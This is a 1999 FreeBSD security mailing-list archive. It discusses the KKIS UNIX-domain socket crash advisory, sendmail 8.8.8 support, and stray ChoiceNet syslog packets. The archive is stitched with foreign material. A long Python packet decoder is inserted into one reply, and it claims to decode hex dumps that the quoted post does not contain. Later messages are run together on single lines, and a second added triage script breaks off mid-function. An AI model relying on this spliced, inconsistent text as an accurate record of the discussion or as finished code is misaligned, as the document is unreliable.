Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id RAA28401; Fri, 7 May 1999 17:21:30 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id RAA11146; Fri, 7 May 1999 17:21:29 -0700 (PDT)
Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id RAA16889; Fri, 7 May 1999 17:21:24 -0700 (PDT)
From: Don Lewis
Message-Id: <199905080021.RAA16889@salsa.gv.tsc.tdk.com>
Date: Fri, 7 May 1999 17:21:24 -0700
In-Reply-To: Kevin Day "Re: KKIS.05051999.003b" (May 6, 2:10pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Kevin Day , BUGTRAQ@netspace.org
Subject: Re: KKIS.05051999.003b
Cc: security@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On May 6, 2:10pm, Kevin Day wrote:
} Subject: Re: KKIS.05051999.003b
} > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
} > Report title : Security problem with sockets in FreeBSD's
} > implementation of UNIX-domain protocol family.
} > Problem found by : Lukasz Luzar (lluzar@security.kki.pl)
} > Report created by : Robert Pajak (shadow@security.kki.pl)
} > Lukasz Luzar (lluzar@security.kki.pl)
} > Report published : 5th May 1999
} > Report code : KKIS.05051999.003.b
} > Systems affected : FreeBSD-3.0 and maybe 3.1,
} > Archive : http://www.security.kki.pl/advisories/
} > Risk level : high
} >
} > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
} > As you know, "The UNIX-domain protocol family is a collection of protocols
} > that provides local interprocess communication through the normal socket
} > mechanism. It supports the SOCK_STREAM and SOCK_DGRAM socket types and uses
} > filesystem pathnames for addressing."
} > The SOCK_STREAM sockets also support the communication of UNIX file
} > descriptors through the use of the functions sendmsg() and recvmsg().
} > While testing UNIX-domain protocols, we have found a probable bug in
} > FreeBSD's implementation of this mechanism.
} > When we ran the attached example on FreeBSD-3.0 as a local user, the system
} > crashed immediately with the error "Supervisor read, page not present"
} > in kernel mode.
} >
}
} Here's my testing so far:
}
} 2.2.2 - Vulnerable
} 2.2.6 - Vulnerable
} 2.2.8 - Vulnerable
} 3.1-RELEASE - Ran 15 minutes, no crash.

I'd be willing to bet that 3.0-RELEASE is also vulnerable. I believe Matt
Dillon fixed this earlier this year in revisions 1.38/1.39 (-CURRENT branch
January 21, 1999) and 1.37.2.1 (RELENG_3 branch February 15, 1999) of
sys/kern/uipc-usrreq.c. The RELENG_3 branch fix was committed just before
3.1-RELEASE.
From owner-freebsd-security Fri May 7 17:25:18 1999
Delivered-To: freebsd-security@freebsd.org
Received: from bamboo.verinet.com (bamboo.verinet.com [204.144.246.5]) by hub.freebsd.org (Postfix) with ESMTP id 506A314EA7; Fri, 7 May 1999 17:25:13 -0700 (PDT) (envelope-from allenc@verinet.com)
Received: from const. (allenc.verinet.com [199.45.180.181]) by bamboo.verinet.com (8.8.7/8.7.1) with ESMTP id SAA24945; Fri, 7 May 1999 18:24:52 -0600
Received: from verinet.com (IDENT:allenc@pragma. [192.168.1.2]) by const. (8.9.2/8.9.2) with ESMTP id AAA27801; Sat, 8 May 1999 00:27:49 GMT (envelope-from allenc@verinet.com)
Message-ID: <3733846C.1CA166E@verinet.com>
Date: Fri, 07 May 1999 18:25:16 -0600
From: Allen Campbell
X-Mailer: Mozilla 4.51 [en] (X11; I; Linux 2.2.5 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: Brett Glass
Cc: chris@calldei.com, Will Mitayai Keeso Rowe , stable@FreeBSD.ORG, security@FreeBSD.ORG, Matt Scollard
Subject: Re: Sendmail 8.8.8 probs.
References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <4.2.0.37.19990507154839.044cff00@localhost>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Brett Glass wrote:
>
> 2.2.8 is less than half a year old. It ought to be supported.
>
> --Brett
>
> At 04:07 PM 5/7/99 -0500, Chris Costello wrote:
> >On Fri, May 7, 1999, Will Mitayai Keeso Rowe wrote:
> > > According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there
> > > any plans to update 2.2-STABLE's sendmail?
> >
> > You can always download Sendmail 8.9.3 from sendmail.org, or
> >if you're feeling lucky, migrate to 3.1-STABLE (or wait for 3.2)
> >
> > > ---
> > > Will Mitayai Keeso Rowe
> > > Director of Internet Technology
> > > AEC InfoCenter, Inc
> > > Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada
> > > Phone: +1(416)489-9000 Fax: +1(416)489-3201
> > > Email: mitayai@aecinfo.com Web: http://www.aecinfo.com
> > >
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > > with "unsubscribe freebsd-stable" in the body of the message
> >
> >--
> >Chris Costello
> >Don't stop at one bug.
> >
> >To Unsubscribe: send mail to majordomo@FreeBSD.org
> >with "unsubscribe freebsd-security" in the body of the message
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-stable" in the body of the message

You forgot the patches.

--
Allen Campbell       | Lurking at the bottom of the
allenc@verinet.com   | gravity well, getting old.
From owner-freebsd-security Fri May 7 17:34:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from smtp2.263.net (unknown [202.96.44.20]) by hub.freebsd.org (Postfix) with SMTP id 2347714C8D for ; Fri, 7 May 1999 17:34:21 -0700 (PDT) (envelope-from zylin@263.net)
Received: (fmail 19087 invoked from network); 8 May 1999 00:37:18 -0000
Received: from unknown (HELO 263.net) (202.96.44.26) by smtp2 with SMTP; 8 May 1999 00:37:18 -0000
Received: (fmail 18207 invoked by uid 1004); 8 May 1999 00:33:37 -0000
Date: 8 May 1999 00:33:37 -0000
Message-ID: <19990508003337.18206.fmail@263.net>
Reply-To: zylin@263.net
From: zylin@263.net
To: freebsd-security@freebsd.org
Subject: max files a process can open
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi, I don't know how to change the number of max files a process can open.
Who can help me? Thanx.
__________________________________________________
Welcome to Capital Online free e-mail: http://freemail.263.net

From owner-freebsd-security Fri May 7 21:15:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 0DD22153EE for ; Fri, 7 May 1999 21:15:28 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id AAA04967; Sat, 8 May 1999 00:14:17 -0400 (EDT)
From: mike@sentex.net (Mike Tancsa)
To: zylin@263.net
Cc: freebsd-security@freebsd.org
Subject: Re: max files a process can open
Date: Sun, 09 May 1999 04:23:55 GMT
Message-ID: <37350d9c.992206@mail.sentex.net>
References:
In-Reply-To:
X-Mailer: Forte Agent .99e/32.227
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 7 May 1999 20:34:45 -0400, in sentex.lists.freebsd.misc you wrote:
>Hi, I don't know how to change the number of max files
>a process can open. Who can help me?

This is a question more for questions@freebsd.org, not the security list.
Have a look at /etc/login.conf for details on how to do what you want to do.
---Mike
Mike Tancsa (mdtancsa@sentex.net)
Sentex Communications Corp, Waterloo, Ontario, Canada

From owner-freebsd-security Fri May 7 21:27:51 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id CA91B15616 for ; Fri, 7 May 1999 21:27:48 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id AAA04785; Sat, 8 May 1999 00:12:09 -0400 (EDT)
From: mike@sentex.net (Mike Tancsa)
To: robert@cyrus.watson.org (Robert Watson)
Cc: security@freebsd.org
Subject: Re: Unusual syslog packets, crashing named...
Date: Sun, 09 May 1999 04:21:48 GMT
Message-ID: <37350c62.678976@mail.sentex.net>
References:
In-Reply-To:
X-Mailer: Forte Agent .99e/32.227
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 7 May 1999 20:00:34 -0400, in sentex.lists.freebsd.misc you wrote:
>This afternoon I logged some unusual packets from cp-pm4.glas.apc.org
>coming into the syslog port on two of my hosts (one BSD/OS, the other
>FreeBSD). Since I am not in the habit of accepting [syslog] packets from
>strangers, I tcpdump'd them. I've attached syslogd getting upset, a copy
>of two packets in hex form, and the useful text from the packet below
>that. I don't know if this is a port scan, or what it is, but sending
>ports to other people's hosts using syslog is not very polite. Any takers
>on what this is exactly?
>
>May 7 17:39:03 fledge syslogd: discarded 1 unwanted packets in secure mode
>May 7 17:39:20 fledge syslogd: discarded 2 unwanted packets in secure mode
>May 7 17:40:10 fledge syslogd: discarded 4 unwanted packets in secure mode
>May 7 17:43:37 fledge syslogd: discarded 8 unwanted packets in secure mode
>
>17:40:21.740443 cp-pm4.glas.apc.org.1023 > www.modarchive.com.syslog: udp
>17:40:10.980831 cp-pm4.glas.apc.org.1023 > fledge.watson.org.syslog: udp
>Useful text extracted:
>(some headers) followed by
><14>ChoiceNet Block 195.218.251.5 - 00 50 04 7b 30 c6 12 78 00 10 0c ed 60 12 44 70 66 f1 00 00 02 04 05 b4

The text and the host name seem to indicate a Livingston/Lucent Portmaster 4
terminal server. ChoiceNet is their 'filtering' software. On the PMs you can
configure the box to send out via syslog any filter violations. e.g. if the
dialup user is set so that they are only allowed outgoing access to port 110
(POP3), but try to browse, the filter will block them, and send the message
to syslog. My guess is that the person made a typo in setting his/her
loghost.

Are you sure it's crashing named though? or is it just a coincidence...
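The two datagrams from the hex dump in the original post, decoded: an added example written for this thread, not code from any message in it. It checks the IP header checksum and lengths, pulls the syslog PRI and message out of the UDP payload, and applies the allowed-peer test that syslogd's secure mode (-s, with -a allowed_peer) applies; the LOGHOSTS address is a constructed assumption.

```python
"""Decode the two captured syslog datagrams and apply syslogd's secure-mode
decision: a syslog datagram from a host that is not a configured loghost is
"unwanted" and is counted, not logged.  Added example for this thread, not
code from any post; the hex is copied from the tcpdump -x output above."""
import socket
import struct

SYSLOG_PORT = 514
SEVERITY = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
FACILITY = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
            "uucp", "cron", "authpriv", "ftp"]

# Constructed: the only peer this site would accept syslog from.
LOGHOSTS = {"192.0.2.10"}

# The two captures from the post: IPv4 header, UDP header, then the payload.
PACKET_1 = """
4500 007c 1aae 0000 f411 1128 c17c 05c1 cf56 0407 03ff 0202 0068 752f
3c31 343e 4368 6f69 6365 4e65 7420 426c 6f63 6b20 3139 352e 3231 382e
3235 312e 3520 2d20 3030 2035 3020 3034 2037 6120 3566 2062 6420 6435
2030 6120 3030 2030 6620 6537 2035 6320 3530 2031 3120 3232 2033 3820
6461 2035 6620 3030 2030 3020"""
PACKET_2 = """
4500 0088 1a37 0000 ee11 1222 c17c 05c1 cc9c 0c32 03ff 0202 0074 1f36
3c31 343e 4368 6f69 6365 4e65 7420 426c 6f63 6b20 3139 352e 3231 382e
3235 312e 3520 2d20 3030 2035 3020 3034 2037 3820 3330 2038 6320 3865
2031 6320 3030 2030 6620 6362 2037 6520 3630 2031 3220 3434 2037 3020
3263 2066 3920 3030 2030 3020 3032 2030 3420 3035 2062 3420"""


def ip_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum; 0 when a header including its checksum verifies."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_udp(hexdump: str) -> dict:
    """Split a tcpdump -x dump into IPv4/UDP fields and the UDP payload,
    refusing anything that is not a complete, checksum-valid IPv4/UDP packet."""
    raw = bytes.fromhex("".join(hexdump.split()))
    if len(raw) < 28 or raw[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (raw[0] & 0x0F) * 4
    total_len, = struct.unpack("!H", raw[2:4])
    if total_len != len(raw):
        raise ValueError("IP total length %d but %d bytes captured" % (total_len, len(raw)))
    if ip_checksum(raw[:ihl]) != 0:
        raise ValueError("bad IP header checksum")
    if raw[9] != socket.IPPROTO_UDP:
        raise ValueError("not UDP")
    sport, dport, ulen, _csum = struct.unpack("!HHHH", raw[ihl:ihl + 8])
    payload = raw[ihl + 8:ihl + ulen]
    if len(payload) != ulen - 8:
        raise ValueError("UDP payload truncated")
    return {"src": socket.inet_ntoa(raw[12:16]), "dst": socket.inet_ntoa(raw[16:20]),
            "ttl": raw[8], "sport": sport, "dport": dport, "payload": payload}


def parse_syslog(payload: bytes) -> dict:
    """BSD syslog wire format: '<PRI>' then free text; PRI = facility*8 + severity."""
    text = payload.decode("ascii", errors="replace")
    end = text.find(">", 1, 5)
    if not text.startswith("<") or end < 0 or not text[1:end].isdigit():
        raise ValueError("no syslog PRI field")
    pri = int(text[1:end])
    if pri > 191:
        raise ValueError("PRI out of range")
    fac, sev = divmod(pri, 8)
    if fac < len(FACILITY):
        facility = FACILITY[fac]
    elif 16 <= fac <= 23:
        facility = "local%d" % (fac - 16)
    else:
        facility = "facility%d" % fac
    return {"pri": pri, "facility": facility, "severity": SEVERITY[sev],
            "message": text[end + 1:].rstrip()}


def classify(pkt: dict, loghosts=LOGHOSTS) -> str:
    """Secure-mode decision: only port 514 traffic from a configured peer is logged."""
    if pkt["dport"] != SYSLOG_PORT:
        return "ignored: not syslog"
    if pkt["src"] not in loghosts:
        return "unwanted: %s is not a configured loghost" % pkt["src"]
    return "accepted"


if __name__ == "__main__":
    for dump in (PACKET_1, PACKET_2):
        pkt = parse_ipv4_udp(dump)
        msg = parse_syslog(pkt["payload"])
        print("%s:%d -> %s:%d  %s.%s  %r\n  -> %s" % (
            pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"],
            msg["facility"], msg["severity"], msg["message"], classify(pkt)))
```

The second capture's destination decodes to 204.156.12.50, the fledge.watson.org address in the Received header, so the dump is intact; the blocked-packet bytes in each message begin with source port 00 50, i.e. replies from a web server that the ChoiceNet filter dropped.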
---Mike
Mike Tancsa (mdtancsa@sentex.net)
Sentex Communications Corp, Waterloo, Ontario, Canada

From owner-freebsd-security Fri May 7 22:35:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 95E4D153EF for ; Fri, 7 May 1999 22:35:11 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA14390; Fri, 7 May 1999 23:34:59 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <3733CD02.4A9BE15@softweyr.com>
Date: Fri, 07 May 1999 23:34:58 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Don Lewis
Cc: Kevin Day , security@FreeBSD.ORG
Subject: Re: KKIS.05051999.003b
References: <199905080021.RAA16889@salsa.gv.tsc.tdk.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Don Lewis wrote:
>
> On May 6, 2:10pm, Kevin Day wrote:
> }
> } Here's my testing so far:
> }
> } 2.2.2 - Vulnerable
> } 2.2.6 - Vulnerable
> } 2.2.8 - Vulnerable
> } 3.1-RELEASE - Ran 15 minutes, no crash.

Let it keep running. It will (apparently) eventually exhaust all available
file handles in an unrecoverable manner. 3.1-R is better, but not
invulnerable.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 22:57:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id C050214EC2; Fri, 7 May 1999 22:57:50 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA14440; Fri, 7 May 1999 23:57:47 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3733D259.9224A03@softweyr.com> Date: Fri, 07 May 1999 23:57:45 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Sendmail 8.8.8 probs. References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <4.2.0.37.19990507154839.044cff00@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > 2.2.8 is less than half a year old. It ought to be supported. > So build a sendmail 8.9.3 package for 2.2.8 and put it on an FTP server somewhere. Geez, this discussion seems familiar. I got that deja vu feeling all over again. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 7:11: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id B5E5D152DE; Sat, 8 May 1999 07:10:56 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA15076; Sat, 8 May 1999 07:11:29 -0700 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda15072; Sat May 8 07:11:25 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id HAA39550; Sat, 8 May 1999 07:10:26 -0700 (PDT) Message-Id: <199905081410.HAA39550@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdt39546; Sat May 8 07:10:16 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: chris@calldei.com Cc: "Jordan K. Hubbard" , Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Mon, 03 May 1999 22:51:32 CDT." <19990503225131.I10291@holly.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 08 May 1999 07:10:15 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990503225131.I10291@holly.dyndns.org>, Chris Costello writes: > On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > > I have to say that Jamie really let us down by not running a raw > > > tcpdump alongside the second targetted machine here. 
Any chance of > > > provoking these people into "demonstrating" the exploit on a machine, > > > while another connected to the same wire is running > > > > I'd say he or whomever first reported this to bugtraq let us down even > > more by releasing an "advisory" in such an unknown and unverifyable > > state. By doing so, all they've done is hand ammunition to the FUD > > corps and given us no reasonable chance to respond since the advisory > > I get the impression that that was the whole point of the > bugtraq post, to give us more grief. How do we know that it's even true? For all we know it could just be lie to stir the pot. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 7:26:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 08577152DE; Sat, 8 May 1999 07:26:39 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA15136; Sat, 8 May 1999 07:27:29 -0700 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda15134; Sat May 8 07:27:13 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id HAA39682; Sat, 8 May 1999 07:26:17 -0700 (PDT) Message-Id: <199905081426.HAA39682@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdj39678; Sat May 8 07:26:11 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: 
Cy Schubert - ITSD Open Systems Group Cc: chris@calldei.com, "Jordan K. Hubbard" , Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Sat, 08 May 1999 07:10:15 PDT." <199905081410.HAA39550@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 08 May 1999 07:26:10 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It looks like I spoke too soon again. I need to read the last comment in a thread before commenting on one in the middle. My apologies to all. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" In message <199905081410.HAA39550@cwsys.cwsent.com>, Cy Schubert - ITSD Open Sy stems Group writes: > In message <19990503225131.I10291@holly.dyndns.org>, Chris Costello > writes: > > On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > > > I have to say that Jamie really let us down by not running a raw > > > > tcpdump alongside the second targetted machine here. Any chance of > > > > provoking these people into "demonstrating" the exploit on a machine, > > > > while another connected to the same wire is running > > > > > > I'd say he or whomever first reported this to bugtraq let us down even > > > more by releasing an "advisory" in such an unknown and unverifyable > > > state. By doing so, all they've done is hand ammunition to the FUD > > > corps and given us no reasonable chance to respond since the advisory > > > > I get the impression that that was the whole point of the > > bugtraq post, to give us more grief. > > How do we know that it's even true? For all we know it could just be > lie to stir the pot. 
> > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca > ITSD Cy.Schubert@gems8.gov.bc.ca > Province of BC > "e**(i*pi)+1=0" > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 8:17:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 9DAEE14CC4 for ; Sat, 8 May 1999 08:17:40 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA01455; Sat, 8 May 1999 11:17:37 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Sat, 8 May 1999 11:17:37 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Mike Tancsa Cc: security@freebsd.org Subject: Re: Unusual syslog packets, crashing named... In-Reply-To: <37350c62.678976@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 9 May 1999, Mike Tancsa wrote: > The text and the host name seem to indicate a Livingston/Lucent Portmaster > 4 terminal server. ChoiceNet is their 'filtering' software. On the PMs > you can configure the box to send out via syslog any filter violations. > e.g. if the dialup user is set so that they are only allowed outgoing > access to port 110 (POP3), but try to browse, the filter will block them, > and send the message to syslog. My guess is that the person made a typo in > setting his/her loghost. Weird that it got sent to two of our hosts and not more (we have a whole subnet of virtual domains there..) 
I've sent them email to see if that helps. > Are you sure its crashing named though ? or is it just a coincidence... Almost certainly a coincidence, but I was concerned that it happened on the same day. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 12:46:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C60AD14C3D for ; Sat, 8 May 1999 12:46:44 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id VAA16598; Sat, 8 May 1999 21:46:36 +0200 (CEST) (envelope-from des) To: James Snow Cc: Wojtek , freebsd-security@FreeBSD.ORG Subject: Re: KKIS.05051999.003b (fwd) References: From: Dag-Erling Smorgrav Date: 08 May 1999 21:46:35 +0200 In-Reply-To: James Snow's message of "Thu, 6 May 1999 17:16:38 -0400 (EDT)" Message-ID: Lines: 15 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Snow writes: > Other than causing the following problem: > > ls: .: Too many open files in system > > it doesn't appear to be doing anything to me. > > So, 3.1 is in the clear, it seems. For very small values of 'clear'. I consider the inability to open files a major handicap. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
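Returning to the "Unusual syslog packets" thread above (Mike Tancsa's and Robert Watson's messages): the triage a defender would do on those quoted lines is to total what syslogd dropped in secure mode, tally which hosts were sending UDP to port syslog according to tcpdump, decode the PRI of the stray ChoiceNet datagram, and flag any sender that is not an expected loghost client. This is an added example, not code from the thread or from any of the posters; the sample lines are constructed from the quoted ones (the datagram's wrapped IP is rejoined and its hex dump shortened) and the allowlist host is a placeholder.

```python
import re
from collections import Counter

# Constructed sample input, modelled on the lines quoted in the syslog thread.
# The datagram is the quoted ChoiceNet message with its wrapped IP rejoined and
# the trailing hex dump shortened; the allowlist host is a placeholder.
SYSLOGD_LINES = [
    "May 7 17:39:03 fledge syslogd: discarded 1 unwanted packets in secure mode",
    "May 7 17:39:20 fledge syslogd: discarded 2 unwanted packets in secure mode",
    "May 7 17:40:10 fledge syslogd: discarded 4 unwanted packets in secure mode",
    "May 7 17:43:37 fledge syslogd: discarded 8 unwanted packets in secure mode",
]
TCPDUMP_LINES = [
    "17:40:21.740443 cp-pm4.glas.apc.org.1023 > www.modarchive.com.syslog: udp",
    "17:40:10.980831 cp-pm4.glas.apc.org.1023 > fledge.watson.org.syslog: udp",
]
PAYLOAD = b"<14>ChoiceNet Block 195.218.251.5 - 00 50 04 7b 30 c6 12 78"
EXPECTED_LOGHOST_CLIENTS = {"loghost-client.example"}  # placeholder allowlist

DISCARD_RE = re.compile(r"syslogd: discarded (\d+) unwanted packets in secure mode")
# tcpdump prints "src.port > dst.service: udp"; keep only datagrams to port syslog.
TCPDUMP_RE = re.compile(r"^\S+ (?P<src>\S+)\.\d+ > (?P<dst>\S+)\.syslog: udp$")
PRI_RE = re.compile(rb"^<(\d{1,3})>(.*)$", re.S)


def discarded_total(lines):
    """Sum the packet counts syslogd reported while running in secure (-s) mode."""
    return sum(int(m.group(1)) for line in lines if (m := DISCARD_RE.search(line)))


def syslog_senders(lines):
    """Count, per source host, the UDP datagrams to port syslog seen by tcpdump."""
    return Counter(m.group("src") for line in lines if (m := TCPDUMP_RE.match(line)))


def decode_pri(payload):
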